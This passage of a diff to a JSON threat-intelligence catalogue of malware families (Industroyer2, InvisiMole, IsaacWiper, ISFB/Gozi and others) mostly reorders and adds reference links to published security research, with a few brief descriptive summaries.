- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
- "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
"https://twitter.com/silascutler/status/1513870210398363651",
"https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf"
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/",
+ "https://blog.scadafence.com/industroyer2-attack",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://cert.gov.ua/article/39518",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf",
+ "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks",
+ "https://pylos.co/2022/04/23/industroyer2-in-perspective/"
],
"synonyms": [],
"type": []
@@ -27387,15 +28982,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.infy",
- "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
- "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/",
- "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
"http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
- "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
"http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://cloud.tencent.com/developer/article/1738806"
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
+ "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
+ "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/",
+ "https://cloud.tencent.com/developer/article/1738806",
+ "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
+ "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/"
],
"synonyms": [
"Foudre"
@@ -27405,6 +29000,19 @@
"uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
"value": "Infy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.inlock",
+ "https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3071e2d4-c692-4054-a7bf-db9af6fe3b63",
+ "value": "Inlock"
+ },
{
"description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.",
"meta": {
@@ -27442,33 +29050,25 @@
"type": []
},
"uuid": "fa022849-248c-4620-86b4-2a36c704b288",
- "value": "Interception"
+ "value": "Interception (Windows)"
},
{
"description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/",
+ "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
+ "https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf",
- "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "10f50ef8-6e3b-11e8-a648-d73fb4d2f48e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
"value": "InvisiMole"
},
@@ -27491,8 +29091,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
"https://www.symantec.com/security-center/writeup/2015-122210-5128-99",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
"https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html",
"https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
],
@@ -27502,34 +29102,50 @@
"uuid": "44599616-3849-4960-9379-05307287ff80",
"value": "IRONHALO"
},
+ {
+ "description": "According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironnetinjector",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5ec639ab-f6c1-4cbb-87b1-d59344878e98",
+ "value": "IronNetInjector"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper",
"https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
"https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/",
- "https://twitter.com/ESETresearch/status/1521910890072842240",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
"https://experience.mandiant.com/trending-evil-2/p/1",
"https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://twitter.com/ESETresearch/status/1521910890072842240",
+ "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
"https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
],
"synonyms": [
"LASAINRAW"
@@ -27544,93 +29160,100 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
- "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
- "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
- "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
- "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
- "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
- "https://www.youtube.com/watch?v=KvOpNznu_3w",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
- "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass",
- "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "http://benkow.cc/DreambotSAS19.pdf",
- "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
+ "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
+ "https://blog.group-ib.com/gozi-latest-ttps",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
+ "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
+ "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
+ "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
+ "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
+ "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
+ "https://www.youtube.com/watch?v=KvOpNznu_3w",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
+ "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
+ "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
+ "http://benkow.cc/DreambotSAS19.pdf",
+ "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
+ "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.cyberbit.com/new-ursnif-malware-variant/",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
"https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
"https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
- "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
- "https://lokalhost.pl/gozi_tree.txt",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://blog.group-ib.com/gozi-latest-ttps",
- "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
- "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
- "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
- "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
- "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.cyberbit.com/new-ursnif-malware-variant/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware",
- "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
- "https://github.com/mlodic/ursnif_beacon_decryptor",
- "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware"
],
"synonyms": [
"Gozi ISFB",
@@ -27647,11 +29270,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
+ "http://www.clearskysec.com/ismagent/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "http://www.clearskysec.com/ismagent/"
